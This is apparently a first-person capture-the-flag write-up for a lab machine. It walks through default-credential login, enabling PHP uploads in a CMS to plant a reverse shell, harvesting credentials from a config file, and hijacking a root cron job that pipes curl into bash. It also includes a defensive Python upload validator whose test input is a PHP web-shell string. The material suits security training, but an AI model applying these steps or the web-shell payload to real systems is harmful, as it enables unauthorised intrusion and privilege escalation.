Hello everyone, this is my very first write-up that I want to offer to you.
Before this, I hadn't done any write-ups.
Without wasting any time, let's start!!!!
Start the machine by clicking on "Start machine" and wait a couple of minutes for the automatically generated IP to appear on screen.
Nmap:-
sudo nmap -sC -sV -Pn -A 10.10.64.91
During the nmap scan I found that there is only one open port, port 85.
Okay, let's see what is on port 85.
I inspected the page source but didn't find anything there.
GOBUSTER:-
So now let's run gobuster on port 85 and see what we find:
gobuster dir -u http://10.10.64.91:85 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html -t 50
Here we found a directory named "app".
When I visited /app there was a button "Jump", and when I clicked on it, it redirected me to /app/castle.
In /app/castle there is a CMS running, and at the bottom of the page there is a login button; when I clicked it, it redirected me to /app/castle/index.php/login.
HYDRA:-
Here I thought of using hydra for brute-forcing, but first I tried default credentials. admin:admin didn't work, but then I tried admin:password and boom!!! it worked.
After login, it gave me access to the Dashboard.
Here I'm logged in as admin, so I can make any changes I want.
I enumerated and found an exploit for this:
https://vulners.com/hackerone/H1:768322
So let's try this exploit and see what happens.
According to this exploit we have to log in as admin (and we are already logged in as admin).
After this we have to allow the .php extension, so that we can upload our PHP reverse shell.
let's do it:-
On the right side there is a menu; from there go to System & Settings, and under Files there is an option to allow file types.
In this option, add .php and click on the Save button.
Now let's go to the Files menu and from there to the file manager.
Now, on your own machine, create a PHP reverse shell file with a .php extension and upload it.
Once the file is uploaded you will see a green line under the file (this means the file has been uploaded successfully).
After all this, click on the (X) exit button and a popup will open containing the URL of the uploaded file.
After starting a listener, click on the URL and you will get the reverse shell.
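The weakness used above is that the CMS trusts its "allowed file types" list completely: once an administrator adds .php, any uploaded file with that extension is written into the web root and executed by the server. As an added example (my own Python, not code from the CMS or from this room), here is the purely list-driven check next to a hardened version that refuses server-executable extensions no matter what the list says, rejects double extensions such as shell.php.jpg, and compares the file's magic bytes with the type the name claims. The extension and magic-byte tables are constructed for the example.

```python
import os

# Extensions the server would execute; an upload handler should never accept
# these even if an administrator adds them to the allowed list.
# Constructed for this example; a real deployment would tune it to its stack.
SERVER_EXECUTABLE = {
    "php", "php3", "php4", "php5", "phtml", "phar",
    "cgi", "pl", "py", "sh", "jsp", "asp", "aspx",
}

# Magic bytes for the image types this hypothetical uploader accepts.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def weak_is_allowed(filename, allowed):
    """List-driven check like the one the write-up bypasses: it looks only at
    the final extension and trusts whatever the admin configured."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in allowed


def sanitize_allowed_types(configured):
    """Hardened configuration: strip server-executable types from the
    admin-supplied list before it is ever consulted."""
    return {e.lower().lstrip(".") for e in configured} - SERVER_EXECUTABLE


def hardened_is_allowed(filename, content, configured):
    """Hardened check. Returns (accepted, reason).

    Every dotted component after the base name must be on the sanitized
    allowlist (so shell.php.jpg fails on 'php'), dotfiles and extensionless
    names are rejected, and the content's magic bytes must match the type
    the final extension claims."""
    allowed = sanitize_allowed_types(configured)
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or empty extension"
    exts = parts[1:]
    for e in exts:
        if e in SERVER_EXECUTABLE:
            return False, f"server-executable extension .{e}"
        if e not in allowed:
            return False, f".{e} not on allowlist"
    claimed = exts[-1]
    for magic, kind in IMAGE_MAGIC.items():
        if content.startswith(magic):
            if kind == claimed or (kind == "jpg" and claimed == "jpeg"):
                return True, "ok"
            return False, f"content is {kind} but name claims .{claimed}"
    return False, "content does not match any allowed image type"


if __name__ == "__main__":
    # Constructed inputs: a PHP payload and a real PNG header.
    configured = ["jpg", "png", "php"]          # admin added php, as in the room
    php_payload = b"<?php system($_GET['cmd']); ?>"
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    print("weak:    ", weak_is_allowed("shell.php", set(configured)))
    print("hardened:", hardened_is_allowed("shell.php", php_payload, configured))
    print("hardened:", hardened_is_allowed("shell.php.jpg", png_header, configured))
    print("hardened:", hardened_is_allowed("logo.png", png_header, configured))
```

The point of sanitize_allowed_types is that the decision about executable types is taken out of the administrator's hands entirely; the write-up shows why an admin-editable list is the wrong place for that boundary. Storing uploads outside the document root, with execution disabled for that directory, is the usual complement to this check.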
After getting the reverse shell, first of all I checked the configuration files and, as expected, found the credentials of the toad user in /var/www/html/app/castle/application/config/database.php.
Okay, now let's move to the toad user using su toad.
After this I downloaded linpeas.sh into the /tmp directory, ran it with ./linpeas.sh, and found something interesting in the environment variables (you can see the environment variables directly using the env command).
Here, in Pwd_token, I found a base64 encoded string.
Let's decode this using CyberChef.
But I still can't read the flag because it is owned by the root user.
so let's move to root user:--
Again I ran linpeas and didn't find anything useful. After that I downloaded pspy64, ran it on the machine, and found that there is a process running every minute (curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.lo) and it is running as root.
let's exploit this:-
First I checked the /etc/hosts file, and mkingdom.thm is set to 127.0.1.1.
And this service is running on port 85 (found in linpeas).
Now I recreated the full path of this process on my own machine, created a counter.sh file, and pasted this command into it.
And hurray!!! you are root now......
But you still can't cat the flag, so you have to use this command for the flag: tac /root.txt
thanks for reading!!!!